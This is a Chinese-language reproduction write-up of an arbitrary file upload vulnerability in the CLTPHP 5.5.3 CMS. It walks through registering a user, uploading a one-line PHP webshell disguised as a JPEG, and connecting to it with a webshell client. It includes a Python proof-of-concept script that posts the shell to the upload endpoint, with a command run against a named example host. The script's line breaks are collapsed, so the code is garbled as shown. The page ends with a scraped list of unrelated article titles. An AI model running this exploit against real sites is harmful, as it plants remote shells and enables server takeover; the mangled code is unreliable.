一、漏洞简介

CLTPHP采用ThinkPHP开发,后台采用Layui框架的内容管理系统。

二、漏洞影响

CLTPHP 5.5.3

三、复现过程

找到一个注册界面

随便注册一个用户,登陆后在设置里找到一个上传点

上传我们的一句话木马

查看返回包,上传成功

访问失败,猜测返回路径可能不是绝对路径

通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success!

菜刀连接

PoC

payload.py

#!/usr/bin/python
#-*- coding: UTF-8 -*-
#Author:Bypass
#Date:2018.03.01
import requests
import sysdef CLPHP_upload(url):header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' ,'X-Requested-With': 'XMLHttpRequest',} geturl = url+"/user/upFiles/upload"files ={'file':('1.php',open('1.php','rb'),'image/jpeg')}res = requests.post(geturl, files=files,headers=header)print res.textif __name__ == "__main__":if len(sys.argv) == 2:url=sys.argv[1]CLPHP_upload(url)sys.exit(0)else:print ("usage: %s xxx.com " % sys.argv[0])sys.exit(-1)

使用方法

把payload.py和一句话.php放到同一文件夹下

cmd执行 python payload.py www.0-sec.org

参考链接

https://www.cnblogs.com/unixcs/p/11244463.html

CLTPHP 5.5.3 任意文件上传漏洞相关推荐

  1. 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞分析

      0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...

  2. php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞

    事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...

  3. 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...

  4. 任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞

    发布日期:2012-11-28 更新日期:2012-12-04 受影响系统: ozerov BigDump 0.29b 描述: ------------------------------------ ...

  5. vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...

    文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...

  6. 织梦guestbook.php漏洞,DEDE:织梦漏洞修复(含任意文件上传漏洞与注入漏洞)

    这几天阿里频繁提醒网站有漏洞,搞得我不胜其烦,好吧,我修复还不行吗?搜索之后整理如下,仅供参考(5.7以上版本适用): 任意文件上传漏洞修复 一./include/dialog/select_soft ...

  7. 详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

     聚焦源代码安全,网罗国内外最新资讯! 概述 Sonlogger 是土耳其SFC 公司 开发的一款应用软件,兼容土耳其<第5651号法>,是一款基于 Web 的 SonicWall 防火墙 ...

  8. FireEye 红队失窃工具大揭秘之:分析复现 Zoho 任意文件上传漏洞(CVE-2020-8394)

     聚焦源代码安全,网罗国内外最新资讯! 前言 最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗.虽然目前尚不清楚这些红队工具将被如 ...

  9. 畅捷通T+ v17任意文件上传漏洞复现

    1.前言 8月29晚上就开始收到通知,让我们来排查一下是否有使用畅捷通的系统,说是疑似0day导致很多用户被植入勒索病毒,一时间风头十足.第二天很多平台都更新的防护策略,本次漏洞是任意文件上传漏洞,如 ...

最新文章

  1. MySQL查询随机数据的4种方法和性能对比
  2. 魅族员工跳槽OPPO后感慨,公司高层各种反思,不会骂员工废材
  3. Oracle中的date与timestamp
  4. linux统计使用最多的10个命令
  5. 搜狐视频怎么修改昵称
  6. logistics回归分析+代码详解
  7. java图片预览上传_java实现文件上传、下载、图片预览
  8. 《Python爬虫开发与项目实战》——第1章 回顾Python编程 1.1 安装Python
  9. Linux文件类型与文件权限详解(三)
  10. Pyshark获取data-text-lines字段的值
  11. Android 控件 -------- AutoCompleteTextView 动态匹配内容,例如 百度搜索提示下拉列表功能...
  12. [转载]HTTP的幂等性
  13. python - 搜狗词库 (.scel 文件转 txt)
  14. 前后端分离微服务管理系统项目实战SaaS-HRM项目(七)——POI报表入门
  15. 企业服务的定义、分类与特点
  16. 华为搜索引擎Petal与Google的区别
  17. linux下查看eml类型文件
  18. Geek ? 什么是 Geek ? 谁是 Geek ?
  19. win7计算机名怎么是感叹号,Win7连接wifi信号后出现感叹号三种原因和解决方法
  20. 自学 9个月 Java 找到了一份 12K 的工作,前辈的方式值得分享给大伙

热门文章

  1. cansina 目录_一个高级web目录扫描工具,功能将会强于DirBuster、Dirsearch、cansina、御剑。...
  2. oppor11s的位置服务器,OPPOR11s高配版和标准版区别是什么【详细介绍】
  3. ConEmu –带选项卡的Windows控制台模拟器
  4. 面试季,覆盖70%-80%的面经基础题(java及安卓)-------数据结构与算法篇
  5. 让 RadAsm + masm32 环境支持 Irvine32.lib
  6. 辗转相除法求最大公约数(Python)
  7. lightgbm pandas安装_LightGBM - osc_qvx22rgc的个人空间 - OSCHINA - 中文开源技术交流社区...
  8. HTML中动态图片的onclick事件参数传递
  9. Java8新特性Optional类
  10. 南京玄武区就业证、档案转迁办理